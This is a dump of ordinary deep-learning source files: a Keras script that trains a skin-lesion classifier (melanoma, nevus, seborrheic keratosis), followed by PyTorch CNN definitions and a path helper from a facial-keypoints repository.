VALIDATION_DATA = os.path.join(BASE_PATH, 'valid')
TEST_DATA = os.path.join(BASE_PATH, 'test')
MAPPING = {'seborrheic_keratosis': 0,
'melanoma': 1,
'nevus': 2}
def load_dataset(image_directory, dataset):
image_list = []
image_labels = []
image_types = {'seborrheic_keratosis', 'melanoma', 'nevus'}
x_name = f'./{dataset}_images.npy'
y_name = f'./{dataset}_labels.npy'
# Iterate over each subfolder corresponding to the type of image and add the image to the resulting list.
if not Path(x_name).is_file() or not Path(y_name).is_file():
for image_type in image_types:
print(f'Loading images in folder: {os.path.join(image_directory, image_type)}')
for file in glob.glob(os.path.join(image_directory, image_type, '*')):
image = mpimg.imread(file)
print(image.shape)
image = cv2.resize(image, (299, 299))
print(image.shape)
if image is not None:
image_list.append(image)
image_labels.append(MAPPING[image_type])
image_list = np.array(image_list)
image_labels = np.array(image_labels)
np.save(x_name, image_list)
np.save(y_name, image_labels)
else:
image_list = np.load(x_name)
image_labels = np.load(y_name)
return image_list, image_labels
def get_model(train_all_layers=False):
base_model = InceptionResNetV2(include_top=False, weights='imagenet', input_shape=(299, 299, 3))
x = base_model.output
x = GlobalAveragePooling2D()(x)
x = Dense(1024, kernel_initializer='uniform')(x)
x = BatchNormalization()(x)
x = LeakyReLU()(x)
x = Dense(512, kernel_initializer='uniform')(x)
x = BatchNormalization()(x)
x = LeakyReLU()(x)
x = Dense(3, kernel_initializer='uniform')(x)
x = BatchNormalization()(x)
predictions = Activation('softmax')(x)
model = Model(inputs=base_model.input, outputs=predictions)
if not train_all_layers:
for layer in base_model.layers:
layer.trainable = False
model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['acc', metrics.categorical_accuracy])
return model
def train_model(model,
epochs=50,
batch_size=64,
train_steps_per_epoch=None,
validation_steps=None):
# Data augmentation generators
train_datagen = ImageDataGenerator(rescale=1. / 255,
horizontal_flip=True,
rotation_range=10)
test_datagen = ImageDataGenerator(rescale=1. / 255)
# Actual generators
x_train, y_train = load_dataset(TRAIN_DATA, 'train')
y_train = to_categorical(y_train, num_classes=3)
train_generator = train_datagen.flow(x_train, y_train, batch_size=batch_size)
x_validation, y_validation = load_dataset(VALIDATION_DATA, 'validation')
y_validation = to_categorical(y_validation, num_classes=3)
validation_generator = test_datagen.flow(x_validation, y_validation, batch_size=batch_size)
callbacks = [
TensorBoard(),
EarlyStopping(patience=4),
ModelCheckpoint('weights.{epoch:02d}-{val_loss:.2f}.hdf5'),
ReduceLROnPlateau(monitor='val_loss', factor=0.2, patience=3, min_lr=0.001)
]
if train_steps_per_epoch is None:
train_steps_per_epoch = len(x_train) // batch_size
if validation_steps is None:
validation_steps = len(x_validation) // batch_size
model.fit_generator(train_generator,
steps_per_epoch=train_steps_per_epoch,
epochs=epochs,
validation_data=validation_generator,
validation_steps=validation_steps,
callbacks=callbacks)
def resume_training(weight_file_path,
epochs=50,
batch_size=64,
train_steps_per_epoch=2000,
validation_steps=800):
model = load_model(weight_file_path)
train_model(model, epochs, batch_size, train_steps_per_epoch, validation_steps)
if __name__ == '__main__':
# m = get_model()
# train_model(m, batch_size=16)
# file = './weights.01-1.54.hdf5'
# resume_training(file, batch_size=16, epochs=49)
m = load_model('./weights.02-1.11.hdf5')
x_test, y_test = load_dataset(TEST_DATA, 'test')
print(m.predict(x_test))
```
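A small follow-up sketch (added for illustration, not part of the repository): the probability rows returned by `m.predict(x_test)` can be mapped back to class names by inverting the `MAPPING` dictionary defined above and taking the argmax of each row.
```python
import numpy as np

# Inverse of MAPPING defined in model.py: class index -> class name
INDEX_TO_CLASS = {0: 'seborrheic_keratosis', 1: 'melanoma', 2: 'nevus'}

def decode_predictions(probabilities):
    """Turn an (N, 3) array of softmax outputs into class-name labels."""
    return [INDEX_TO_CLASS[i] for i in np.argmax(probabilities, axis=1)]

# Example with dummy probability rows
print(decode_predictions(np.array([[0.1, 0.7, 0.2], [0.8, 0.1, 0.1]])))
# ['melanoma', 'seborrheic_keratosis']
```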
|
{
"source": "jesus-a-martinez-v/facial-keypoints",
"score": 3
}
|
#### File: jesus-a-martinez-v/facial-keypoints/models.py
```python
import torch.nn as nn
import torch.nn.functional as F
def _flatten(x):
return x.view(x.size(0), -1)
# Reference: https://arxiv.org/pdf/1710.00977.pdf
class NaimishNet(nn.Module):
def __init__(self):
super(NaimishNet, self).__init__()
self.convolution_1 = nn.Conv2d(in_channels=1, out_channels=32, kernel_size=4)
# I.uniform_(self.convolution_1.weight)
self.maxpooling_1 = nn.MaxPool2d(kernel_size=2)
self.dropout_1 = nn.Dropout(p=0.1)
self.convolution_2 = nn.Conv2d(in_channels=32, out_channels=64, kernel_size=3)
# I.uniform_(self.convolution_2.weight)
self.maxpooling_2 = nn.MaxPool2d(kernel_size=2)
self.dropout_2 = nn.Dropout(p=0.2)
self.convolution_3 = nn.Conv2d(in_channels=64, out_channels=128, kernel_size=2)
# I.uniform_(self.convolution_3.weight)
self.maxpooling_3 = nn.MaxPool2d(kernel_size=2)
self.dropout_3 = nn.Dropout(p=0.3)
self.convolution_4 = nn.Conv2d(in_channels=128, out_channels=256, kernel_size=1)
# I.uniform_(self.convolution_4.weight)
self.maxpooling_4 = nn.MaxPool2d(kernel_size=2)
self.dropout_4 = nn.Dropout(p=0.4)
self.fully_connected_1 = nn.Linear(in_features=43264, out_features=1000)
# I.xavier_uniform_(self.fully_connected_1.weight)
self.dropout_5 = nn.Dropout(p=0.5)
self.fully_connected_2 = nn.Linear(in_features=1000, out_features=1000)
# I.xavier_uniform_(self.fully_connected_2.weight)
self.dropout_6 = nn.Dropout(p=0.6)
self.fully_connected_3 = nn.Linear(in_features=1000, out_features=68 * 2)
# I.xavier_uniform_(self.fully_connected_3.weight)
def forward(self, x):
x = self.convolution_1(x)
x = F.elu(x)
x = self.maxpooling_1(x)
x = self.dropout_1(x)
x = self.convolution_2(x)
x = F.elu(x)
x = self.maxpooling_2(x)
x = self.dropout_2(x)
x = self.convolution_3(x)
x = F.elu(x)
x = self.maxpooling_3(x)
x = self.dropout_3(x)
x = self.convolution_4(x)
x = F.elu(x)
x = self.maxpooling_4(x)
x = self.dropout_4(x)
# Flatten
x = _flatten(x)
x = self.fully_connected_1(x)
x = F.elu(x)
x = self.dropout_5(x)
x = self.fully_connected_2(x)
x = self.dropout_6(x)
x = self.fully_connected_3(x)
return x
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.convolution_1 = nn.Conv2d(in_channels=1, out_channels=32, kernel_size=5, stride=1)
# I.uniform_(self.convolution_1.weight)
self.maxpooling_1 = nn.MaxPool2d(kernel_size=2)
self.convolution_2 = nn.Conv2d(in_channels=32, out_channels=64, kernel_size=5, stride=1)
self.maxpooling_2 = nn.MaxPool2d(kernel_size=2)
self.fully_connected_1 = nn.Linear(in_features=179776, out_features=512)
self.dropout_1 = nn.Dropout(0.5)
self.fully_connected_2 = nn.Linear(in_features=512, out_features=68 * 2)
def forward(self, x):
x = self.convolution_1(x)
x = F.relu(x)
x = self.maxpooling_1(x)
x = self.convolution_2(x)
x = F.relu(x)
x = self.maxpooling_2(x)
# Flatten
x = _flatten(x)
x = self.fully_connected_1(x)
x = F.relu(x)
x = self.dropout_1(x)
x = self.fully_connected_2(x)
return x
```
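A quick shape-check sketch (added for illustration, not part of the repository): the hard-coded `in_features` values above (43264 = 256·13·13 and 179776 = 64·53·53) are consistent with single-channel 224×224 inputs, so a dummy batch of that size should flow through both models and produce 68 (x, y) keypoint pairs.
```python
import torch

from models import NaimishNet, Net  # assumes the file above is saved as models.py

dummy = torch.randn(1, 1, 224, 224)  # one grayscale 224x224 face crop

for model in (NaimishNet(), Net()):
    model.eval()
    with torch.no_grad():
        output = model(dummy)
    print(type(model).__name__, output.shape)  # expected: torch.Size([1, 136])
```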
#### File: jesus-a-martinez-v/facial-keypoints/utils.py
```python
def build_path(segment, running_on_floydhub=False):
"""
Builds the full path to `segment`, depending on where we are running our code.
Args:
    segment: File or directory we want to build the full path to.
    running_on_floydhub: Whether the code runs on FloydHub, which changes the data root.
"""
if running_on_floydhub:
return '/floyd/input/data/{}'.format(segment)
else:
return 'data/{}'.format(segment)
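# Illustrative usage (added comment); the file name is hypothetical:
# build_path('training_frames_keypoints.csv')                           -> 'data/training_frames_keypoints.csv'
# build_path('training_frames_keypoints.csv', running_on_floydhub=True) -> '/floyd/input/data/training_frames_keypoints.csv'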
```
|